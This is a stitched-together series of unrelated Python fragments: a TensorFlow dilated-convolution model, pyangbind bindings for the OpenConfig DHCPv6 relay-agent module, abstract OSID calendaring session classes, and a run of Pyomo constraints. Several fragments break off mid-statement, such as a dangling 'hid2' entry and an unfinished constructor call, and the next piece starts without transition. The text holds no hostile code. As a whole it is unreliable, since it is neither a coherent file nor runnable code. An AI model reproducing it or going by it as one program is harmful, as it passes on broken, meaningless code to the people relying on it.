# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(_batch_norm(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"], is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"], is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"], is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"], is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv4_pooled = atrous_pool(h_conv4, filter_height, 27)
h_conv5 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"], is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv5_pooled = atrous_pool(h_conv5, filter_height, 81)
h_conv6 = tf.nn.dropout(tf.nn.relu(_batch_norm(tf.nn.conv2d_transpose(h_conv5_pooled, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"], is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def convolution_7_layer_resizing(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv7"),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": | |
extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_interface_ref(self):
"""
Getter method for interface_ref, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/interface_ref (container)
YANG Description: Reference to an interface or subinterface
"""
return self.__interface_ref
def _set_interface_ref(self, v, load=False):
"""
Setter method for interface_ref, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/interface_ref (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface_ref is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface_ref() directly.
YANG Description: Reference to an interface or subinterface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface_ref must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__interface_ref = t
if hasattr(self, '_set'):
self._set()
def _unset_interface_ref(self):
self.__interface_ref = YANGDynClass(base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_options(self):
"""
Getter method for options, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options (container)
YANG Description: Top-level container for DHCPv6 agent options on interfaces
"""
return self.__options
def _set_options(self, v, load=False):
"""
Setter method for options, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_options is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_options() directly.
YANG Description: Top-level container for DHCPv6 agent options on interfaces
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """options must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__options = t
if hasattr(self, '_set'):
self._set()
def _unset_options(self):
self.__options = YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
id = __builtin__.property(_get_id, _set_id)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
interface_ref = __builtin__.property(_get_interface_ref, _set_interface_ref)
options = __builtin__.property(_get_options, _set_options)
_pyangbind_elements = OrderedDict([('id', id), ('config', config), ('state', state), ('interface_ref', interface_ref), ('options', options), ])
class yc_interfaces_openconfig_relay_agent__relay_agent_dhcpv6_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-relay-agent - based on the path /relay-agent/dhcpv6/interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Enclosing container for the list of interface references.
"""
__slots__ = ('_path_helper', '_extmethods', '__interface',)
_yang_name = 'interfaces'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__interface = YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['relay-agent', 'dhcpv6', 'interfaces']
def _get_interface(self):
"""
Getter method for interface, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface (list)
YANG Description: List of interfaces on which the relay agent is
configured.
"""
return self.__interface
def _set_interface(self, v, load=False):
"""
Setter method for interface, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface() directly.
YANG Description: List of interfaces on which the relay agent is
configured.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
interface = __builtin__.property(_get_interface, _set_interface)
_pyangbind_elements = OrderedDict([('interface', interface), ])
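def _example_add_interface():
    # Illustrative sketch, not part of the generated bindings: pyangbind
    # list containers expose an add(<key>) method keyed on the YANG list
    # key ('id'), so a relay-agent interface entry is created like this
    # (the interface name "eth0" is an assumed example value):
    ifaces = yc_interfaces_openconfig_relay_agent__relay_agent_dhcpv6_interfaces()
    entry = ifaces.interface.add("eth0")
    return entry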
class yc_dhcpv6_openconfig_relay_agent__relay_agent_dhcpv6(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-relay-agent - based on the path /relay-agent/dhcpv6. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Top-level container for global relay agent data
"""
__slots__ = ('_path_helper', '_extmethods', '__config','__state','__options','__interfaces',)
_yang_name = 'dhcpv6'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__config = YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__options = YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__interfaces = YANGDynClass(base=yc_interfaces_openconfig_relay_agent__relay_agent_dhcpv6_interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['relay-agent', 'dhcpv6']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /relay_agent/dhcpv6/config (container)
YANG Description: Configuration data for global DHCPv6
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /relay_agent/dhcpv6/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: Configuration data for global DHCPv6
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /relay_agent/dhcpv6/state (container)
        YANG Description: Operational state data for global DHCPv6
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /relay_agent/dhcpv6/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
        YANG Description: Operational state data for global DHCPv6
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
        self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent',
session.
This ``Calendar`` has a default query that matches any superseding
event and a default search order that specifies no sequencing. The
queries may be examined using a ``SupersedingEventQueryInspector``.
The query may be modified by converting the inspector back to a
``SupersedingEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_manage_smart_calendars(self):
"""Tests if this user can manage smart calendars.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer smart
operations.
:return: ``false`` if smart calendar methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_superseding_event_query(self):
"""Gets a superseding event query.
:return: the superseding event query
:rtype: ``osid.calendaring.SupersedingEventQuery``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQuery
superseding_event_query = property(fget=get_superseding_event_query)
@abc.abstractmethod
def get_superseding_event_search_order(self):
"""Gets a superseding event search order.
:return: the superseding event search order
:rtype: ``osid.calendaring.SupersedingEventSearchOrder``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventSearchOrder
superseding_event_search_order = property(fget=get_superseding_event_search_order)
@abc.abstractmethod
def apply_superseding_event_query(self, superseding_event_query):
"""Applies a superseding event query to this calendar.
:param superseding_event_query: the superseding event query
:type superseding_event_query: ``osid.calendaring.SupersedingEventQuery``
:raise: ``NullArgument`` -- ``superseding_event_query`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
:raise: ``Unsupported`` -- ``superseding_event_query`` not of this service
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def inspect_superseding_event_query(self):
"""Gets a superseding event query inspector for this calendar.
:return: the superseding event query inspector
:rtype: ``osid.calendaring.SupersedingEventQueryInspector``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQueryInspector
@abc.abstractmethod
def apply_superseding_event_sequencing(self, superseding_event_search_order):
"""Applies a superseding event search order to this calendar.
:param superseding_event_search_order: the superseding event search order
:type superseding_event_search_order: ``osid.calendaring.SupersedingEventSearchOrder``
:raise: ``NullArgument`` -- ``superseding_event_search_order`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
:raise: ``Unsupported`` -- ``superseding_event_search_order`` not of this service
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def get_superseding_event_query_from_inspector(self, superseding_event_query_inspector):
"""Gets a superseding event query from an inspector.
:param superseding_event_query_inspector: a superseding event query inspector
:type superseding_event_query_inspector: ``osid.calendaring.SupersedingEventQueryInspector``
:return: the superseding event query
:rtype: ``osid.calendaring.SupersedingEventQuery``
:raise: ``NullArgument`` -- ``superseding_event_query_inspector`` is ``null``
:raise: ``Unsupported`` -- ``superseding_event_query_inspector`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQuery
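# Illustrative sketch, not part of the OSID abstract definitions: a provider
# fulfils these session contracts by subclassing and implementing every
# abstract method. A minimal in-memory lookup session (all names below are
# assumed, not taken from the spec) might begin:
#
#     class InMemoryOffsetEventLookupSession(OffsetEventLookupSession):
#         def __init__(self, calendar, events_by_id):
#             self._calendar = calendar
#             self._events = events_by_id
#
#         def get_calendar_id(self):
#             return self._calendar.get_id()
#
#         def get_offset_event(self, offset_event_id):
#             return self._events[offset_event_id]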
class OffsetEventLookupSession:
"""This session provides methods for retrieving ``OffsetEvents``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_lookup_offset_events(self):
"""Tests if this user can perform ``OffsetEvent`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
:return: ``false`` if lookup methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def use_comparative_offset_event_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as
authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def use_plenary_offset_event_view(self):
"""A complete view of the ``OffsetEvent`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def use_federated_calendar_view(self):
"""Federates the view for methods in this session.
A federated view will include offset events in calendars which
are children of this calendar in the calendar hierarchy.
        *compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def use_isolated_calendar_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this calendar only.
        *compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def use_active_offset_event_view(self):
"""Only active offset events are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_any_status_offset_event_view(self):
"""All active and inactive offset events are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def get_offset_event(self, offset_event_id):
"""Gets the ``OffsetEvent`` specified by its ``Id``.
:param offset_event_id: ``Id`` of the ``OffsetEvent``
:type offset_event_id: ``osid.id.Id``
:return: the offset event
:rtype: ``osid.calendaring.OffsetEvent``
:raise: ``NotFound`` -- ``offset_event_id`` not found
:raise: ``NullArgument`` -- ``offset_event_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEvent
@abc.abstractmethod
def get_offset_events_by_ids(self, offset_event_ids):
"""Gets an ``OffsetEventList`` corresponding to the given ``IdList``.
:param offset_event_ids: the list of ``Ids`` to retrieve
:type offset_event_ids: ``osid.id.IdList``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
        :raise: ``NotFound`` -- an ``Id`` was not found
:raise: ``NullArgument`` -- ``offset_event_ids`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_genus_type(self, offset_event_genus_type):
"""Gets an ``OffsetEventList`` corresponding to the given offset event genus ``Type`` which does not include
offset events of genus types derived from the specified ``Type``.
:param offset_event_genus_type: an offset event genus type
:type offset_event_genus_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_parent_genus_type(self, offset_event_genus_type):
"""Gets an ``OffsetEventList`` corresponding to the given offset event genus ``Type`` and include any additional
offset event with genus types derived from the specified ``Type``.
:param offset_event_genus_type: an offset event genus type
:type offset_event_genus_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
    def get_offset_events_by_record_type(self, offset_event_record_type):
        """Gets an ``OffsetEventList`` containing the given offset event record ``Type``.
        :param offset_event_record_type: an offset event record type
        :type offset_event_record_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_event(self, event_id):
"""Gets the ``OffsetEvents`` using the given event as a start or ending offset.
:param event_id: ``Id`` of the related event
:type event_id: ``osid.id.Id``
:return: the offset events
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``event_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
0)
m.c1516 = Constraint(expr= m.x279 >= 0)
m.c1517 = Constraint(expr= - 5*m.x152 + m.x280 >= 0)
m.c1518 = Constraint(expr= - 5*m.x153 + m.x281 >= 0)
m.c1519 = Constraint(expr= m.x282 >= 0)
m.c1520 = Constraint(expr= m.x283 >= 0)
m.c1521 = Constraint(expr= m.x284 >= 0)
m.c1522 = Constraint(expr= m.x285 >= 0)
m.c1523 = Constraint(expr= m.x286 >= 0)
m.c1524 = Constraint(expr= m.x287 >= 0)
m.c1525 = Constraint(expr= - 5*m.x160 + m.x288 >= 0)
m.c1526 = Constraint(expr= - 5*m.x161 + m.x289 >= 0)
m.c1527 = Constraint(expr= m.x290 >= 0)
m.c1528 = Constraint(expr= m.x291 >= 0)
m.c1529 = Constraint(expr= m.x292 >= 0)
m.c1530 = Constraint(expr= m.x293 >= 0)
m.c1531 = Constraint(expr= m.x294 >= 0)
m.c1532 = Constraint(expr= m.x295 >= 0)
m.c1533 = Constraint(expr= - 5*m.x168 + m.x296 >= 0)
m.c1534 = Constraint(expr= - 5*m.x169 + m.x297 >= 0)
m.c1535 = Constraint(expr= m.x298 >= 0)
m.c1536 = Constraint(expr= m.x299 >= 0)
m.c1537 = Constraint(expr= m.x300 >= 0)
m.c1538 = Constraint(expr= m.x301 >= 0)
m.c1539 = Constraint(expr= m.x302 >= 0)
m.c1540 = Constraint(expr= m.x303 >= 0)
m.c1541 = Constraint(expr= - 5*m.x176 + m.x304 >= 0)
m.c1542 = Constraint(expr= - 5*m.x177 + m.x305 >= 0)
m.c1543 = Constraint(expr= m.x306 >= 0)
m.c1544 = Constraint(expr= m.x307 >= 0)
m.c1545 = Constraint(expr= m.x308 >= 0)
m.c1546 = Constraint(expr= m.x309 >= 0)
m.c1547 = Constraint(expr= m.x310 >= 0)
m.c1548 = Constraint(expr= m.x311 >= 0)
m.c1549 = Constraint(expr= - 5*m.x184 + m.x312 >= 0)
m.c1550 = Constraint(expr= - 5*m.x185 + m.x313 >= 0)
m.c1551 = Constraint(expr= m.x314 >= 0)
m.c1552 = Constraint(expr= m.x315 >= 0)
m.c1553 = Constraint(expr= m.x316 >= 0)
m.c1554 = Constraint(expr= m.x317 >= 0)
m.c1555 = Constraint(expr= m.x318 >= 0)
m.c1556 = Constraint(expr= m.x319 >= 0)
m.c1557 = Constraint(expr= - 5*m.x192 + m.x320 >= 0)
m.c1558 = Constraint(expr= - 5*m.x193 + m.x321 >= 0)
